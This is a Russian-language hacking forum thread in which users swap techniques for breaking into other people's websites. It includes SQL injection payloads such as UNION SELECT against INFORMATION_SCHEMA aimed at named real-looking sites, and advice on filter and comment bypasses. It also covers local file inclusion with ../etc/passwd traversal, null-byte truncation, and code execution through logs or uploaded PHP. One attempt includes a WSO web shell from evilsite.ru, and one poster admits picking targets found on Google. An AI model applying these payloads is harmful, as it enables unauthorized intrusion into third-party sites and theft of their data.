Ситуация, когда один и тот же параметр учавствет в нескольких запросах: тыц Union'ом можно крутить на другом уязвимом параметре:
http://www.zoovet.ru/forum/gold_fond.php?tid=123&tag=88 Изменяя последнее число получаются разные ошибки, типа http://www.zoovet.ru/forum/gold_fond.php?tid=123&tag=115 можно попробовать как то покрутить? или вообще в каком направлении идти?
Есть сайт с самописной cms, крутится на php 5.3.15, nginx 1.0.5. url'ы вида site.com/lang/site/news/id/33/ ,GET-запросы фильтруються... С какой стороны можно подступиться к аудиту Думаю, для начала просканировать порты nmap. Что подскажут гуру?!
Ошибки вылезают из-за неправилной кодировки. Для первого случая, âåêî - веко (CP1252 ---> CP1251). Крутить не получится.
Можно ли это как то раскрутить, и в каком направлении думатью Движок DLE Запрос http://******.**/soft/page/99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999/
выводит дальше что то неполучается, information_schema почему то тоже нет, разве в 5 Mysql он необязателен? Помогите)
information_schema существует, просто доступа к ней нет у того пользователя от которого делаются запросы.
Добрый день, есть локальный инклуд вида""Warning: include(inc/123.php) [function.include]: failed to open stream: No such file or directory in" когда я в переменную вставляю http://evilsite.ru/wso2.php, то на странице выводится ошибка:"Warning: include(inc/http://evilsite.ru/wso2.php)", вопрос как обрезать добавление префикса "inc/" ? p.s интересует тема тестирования безопасности сайта, выбрал несколько сайтов в гугле, которые выводят такое сообщения и хочу попробовать добиться использования этой уязвимости для более глубокого понимания.
Никак, локальный инклуд и есть локальный инклуд. Пробуй загрузить файл со своим php кодом на сайт и инклудь его.
Его ничем нельзя отрезать ибо он заранее указан как префикс, можно подключить локальный файл, например ../../../../../../etc/passwd (если Unix), почитать логи, выполнить через них код и т.д
Окей, я начал пробовать подключить этот файл, но выводится следующее сообщение HTML: Warning: include(inc/../../../../../../../etc/passwd.php) Когда же добавляю ../../../../../../etc/passwd%00, то вместо ошибки на сайте выводится стандартная страница, как будто без параметров отправился запрос. Какие тут возможные действия дальше?
Просмотри исходный код страници и как вариант еще попробовать ../../../../../../etc/passwd%000 иногда проходит.
Нашёл скулю, не могу достать данные с таблицы admin Code: http://www.olvia.ru/rus/products.php?s=3%27+union+select+1,2,3,TABLE_NAME,5,6,7,8,9,10+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+50,99+--+
Добрый день) server.com/index.php?id=22' выдает следующее: DB ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''22'' LIMIT 1' at line 1 SELECT * FROM `Films` WHERE `ID` = '22'' LIMIT 1 Notice: Undefined index: ID in /usr/local/www/server.com/index.php on line 75 При попытке вставить в запрос UNION SELECT подвисает (Код ошибки: ERR_TIMED_OUT), на UNION SELCT: SELECT * FROM `Films` WHERE `ID` = '22' UNION SELCT' LIMIT 1 Как нибудь можно обойти? И еще фильтрует ##
server.com/index.php?id=-1'+BLA+BLA+BLA+--%20 выдает в коде ошибки: SELECT * FROM `Films` WHERE `ID` = '-1' AND BLA BLA BLA -- ' LIMIT 1 server.com/index.php?id=-1'+BLA+BLA+BLA+#%20 выдает в коде ошибки: SELECT * FROM `Films` WHERE `ID` = '-1' AND BLA BLA BLA ' LIMIT 1 Видимо комментирование только через # и этот символ фильтруется. Что нибудь можно сделать?